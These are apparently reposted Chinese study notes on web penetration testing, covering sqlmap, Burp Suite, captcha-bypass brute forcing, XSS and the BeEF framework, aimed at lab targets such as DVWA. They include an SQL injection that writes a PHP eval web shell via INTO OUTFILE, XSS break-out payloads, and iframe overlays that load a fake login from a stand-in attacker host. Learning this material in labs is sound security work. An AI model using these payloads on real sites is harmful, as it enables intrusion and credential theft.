sqlmap续

大城市里の小女人 提交于 2020-03-09 22:46:16

sqlmap

注入语句(知道绝对路径时候可用)

 http://192.168.99.171/test2/sqli/example10.php?catid=3union select 1,’<? @eval($_POST[xy])?>’,3,4 into outfile ‘C:/xampp/htdocs/test2/xinyu2.php--+

检测注入:http://192.168.99.171/test/xinyu2.php若有返回内容则已经写入

form表单

--random-agent 随机请求

--cookie=COOKIE 身份赋予

--technique=TECH    SQL injection techniques to use (default "BEUSTQ")T时间E错误C

  --dns-domain=DNS..  Domain name used for DNS exfiltration attack

--DNS=DNS..用于DNS渗出攻击的域名

burpwireshark的区别

http协议抓包工具burp,能改能发,实时互动

wireshark不能改只能抓住

burp

target(目标) proxy(代理) spider scanner intruder repeater sequencer decoder compare extend options

详情:

https://blog.csdn.net/lynnlinlin/article/details77488947/

http://blog.csdn.net/lynnlinlin/article/details/76736972

http://blog.csdn.net/lynnlinlin/article/details/77480726

1) Proxy(代理)

代理功能使我们能够截获并修改请求.为了拦截请求,并对其进行操作,修改代理配置. 在这里我们可以编辑代理正在监听的端口.如果我们不选中"listen on loopback interface only"选项,意味着Burp Proxy可以作为一个网络上其它系统的代理。这意味着在同一网络中的任何计算机都可以使用Burp Proxy功能成为代理,并中继通过它的流量. "support invisible proxying for non-proxy-aware client"选项是用于客户端不知道他们使用的是代理的情况下.这意味着代理设置不是设置在浏览器,有时候设置在hosts文件中.在这种情况下,和将代理选项设置在浏览器本身所不同的是Burp需要知道它是从一个非代理客户端接收流量的."redirect to host""redirect to port"选项将客户端重定向到我们在该选项后设置的主机和端口。 这里有个选项用来修改从响应中接收到的html网页。我们可以取消隐藏的表单字段,删除javascript等。还有一个选项用自定义字符串替换掉寻找到的特定的模式.我们需要用指定正则表达式。Burp将解析请求或者响应以期望能够寻找到这种模式,将会用自定义的字符串来替换它.一旦Burp Spider提交一个登陆表单的时候就开始爬行(抓取).它可以自动提交我们提供给它的证书.我们同样可以设置admin/password凭证,设置好之后,他们会做为DVWA中的凭证.因此Burp Spider可以自动提交那些信息凭证,并且保持爬行抓取的状态希望能够获得更多的新的信息.你也可以在thread(线程)项来修改线程数. 这样就会启动Burp Spider,在Spider control标签下我们会看到正在做出的请求,我们也可以为Burp Spider自定义一个范围.

 

2)Intruder(入侵)

Burp Intruder可以用于利用漏洞,模糊测试,暴力猜解等。在这种情况下我们将使用Burp SuiteIntruderDVWA进行暴力猜解攻击.浏览到DVWA,单击"Burp Force(暴力猜解)",随便输入usernamepassword,确保Burp Suite上的"intercept is on(监听是打开的)".然后点击登陆 以上的操作会将请求信息发送给intruder功能.进入intruder标签,配置Burp Suite来发起暴力猜解的攻击.target标签下可以看到已经设置好了要请求攻击的目标 单击右边的"clear"按钮,将会删除所有用不同颜色演示的重要的信息.接下来我们需要配置Burp在这次攻击中只把用户名和密码做为参数.选中本次请求中的username(本例中用户名是指"infosecinstiture")然后单击"Add(添加)".同样的将本次请求中的password也添加进去.这样操作之后,用户名和密码将会成为第一个和第二个参数.一旦你操作完成,输出的样子应该如下图所示: 接下来我们需要设置这次攻击的攻击类型,默认情况下的攻击类型是"Sniper(狙击手)",在本例中,我们将使用"Cluster Bomb(集束炸弹)"的攻击类型.有四种攻击类型,分别是singer,battering ram,pitchfork,cluster bomb.下图中我们看到的我们的攻击类型是"Cluster Bomb' 进入payload标签,确保"payload set"的值是1,点击"load(加载)"加载一个包含用户名的文件 。本例中我们使用一个很小的文件来进行演示.加载之后用户名文件中的用户名会如下图所示 同样设置"payload set"的值为2,点击"load"加载一个密码字典文件。 进入"options"标签,确保results下的"store requests""store responses"已经选择.

3)Repeater(中继转发) 通过Burp Repeater功能,我们可以手动修改一个请求,并且发送出去,来分析返回的响应.我们需要从不同的地方发送请求给Burp Repeater,比如入侵者,代理等.发送一个请求给Repeater,只需要单击右键"send to Repeater". 点开Repeater标签,会看到request,也可以看到名为1233个标签. 我们也可以看到requestparams,header,hexraw格式的请求,发送请求之前,我们可以修改其中的任何一个. 只修改Params请求下的username=adminpassword=password,点击go,这样就会发送这个请求. 我们可以分析response部分返回的响应.

 

fuzz(模糊测试)

文件上传

第一个被检测而第二个不被检测

双文件上传

inurl:/ewebeditor.mdbà查找数据库

 

1.管理员后台

2.整站的rar压缩包(***.rar||***.zip)à代码审计

3.编辑器页面 和编辑器管理员后台à弱口令à文件上传

4.留言板à留言板后台à弱口令à文件上传

5.整站,编辑器,留言板的mdb数据库文件à下载数据库获得用户名密码

6.bak后缀文件(网站源码的备份文件)à拿到网站源码

7.其他攻击者留下的木马à破解密码登录

8.网站安装时留下的说明文件à敏感目录和初始用户名密码

 

GET POST

GET--HEAD

 

 

 

 

index.php登录进去的界面

login.php登录界面

admin/verifycode.php验证代码(丢弃它)

 

绕过验证码(cookie)(burp)【刷新无效】à爆破登录

  1. 原理:验证码往往是单独的一个请求,如果不让它跳转就一直有效(丢弃验证的)
  2. 过程:
    1. 启动burp和一个打开的登录界面
    2. repeater里放弃一个验证的请求
    3. 到了提示密码错误或者用户名错误而不是验证码错误的时候,你就成功了
    4. 然后开始进行用户名密码爆破(用户名可以写一些注入语句)
    5. 比对长度查看与众不同的就是
    6. 注意:速度别太快…数据库会哭死的

 

脑痛的同源策略(约定判断四要素,cookie

1.host(域名或ip地址,如果是ip地址则看做一个根域名)

2.子域名

3.端口

4.协议

 

流动ip

花生壳(动态dns解析)内网穿刺(带你的木马找到回家的路)

以及,翻墙…

 

神奇的xss(精通JavaScript):

1.xss的原理:
脚本会在用户的浏览器上执行,从而达到攻击者的各种目的。

客户端嵌入恶意脚本代码

2.xss类型:

1)反射型

2)存储型

3)本地型(dom型)

 

1.反射型:(php网页)

1)恶意的客户端代码(html/javascript,是在服务器端合成的

2)客户输入什么,不做检测,直接原样在客户端显示和执行

2.本地型(dom)

DOMdocument对象,是在JavaScript当中的一种元素

1)恶意的客户端代码(html/javascript),是在浏览器端合成的

2)客户输入什么,不做检测,直接原样在客户端显示和执行

3.存储型:

1)恶意的客户端代码(html/javascript),存入数据库,或其他持久化形式

2)客户输入什么,不做检测,直接原样在客户端显示和执行

3)恶意代码在服务器端合成

 

beef神器

beef静止浏览器多次请求,进行360防御-.-

使用详情http://netsecurity.51cto.com/art/201307/402179.htm

BeEF是浏览器攻击框架的简称,是一款专注于浏览器端的渗透测试工具。

beef beef

假设此时目标192.168.11.1的服务器访问了这个demo页面

http://192.168.11.152:3000/demos/basic.html。则就被hook上了,

 

实施攻击 HOOK持续的时间为关闭测试页面为止。在此期间,相当于被控制了,可以发送攻击命令了。选择commands栏,可以看到很多已经分好类的攻击模块。 其中,4种颜色分别表示: 该攻击模块可用,且隐蔽性强 该攻击模块可用,但隐蔽性差 该用户模块是否可用还有待验证 该攻击模块不可用

 

username=[X]

xss

闭合:

"><script>alert(1)</script>

"/></textarea><script>alert(1)</script>

注意观察网页源码来使其闭合

 

 

xss盗取cookie

cookie即为身份,交流的牌牌,有一个其他人的身份你就成了其他人,然后一不小心就浏览到了后台页面

xss注入点:任意的输入位置,有输入,就有xss

 

 

 

xss语句

 

<iframe src="http://www.hacker.com/xss/dy.html" height="400" width="100%" scrolling="no" frameborder="0"></iframe>

 

<iframe src="http://www.hacker.com//xss/login.html" height="100%" width="100%" scrolling="no" frameborder="0" style="position:absolute;top:0;margin:0;padding:0;left:0;

z-index:99999999;"></iframe>

短网址生成

 

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!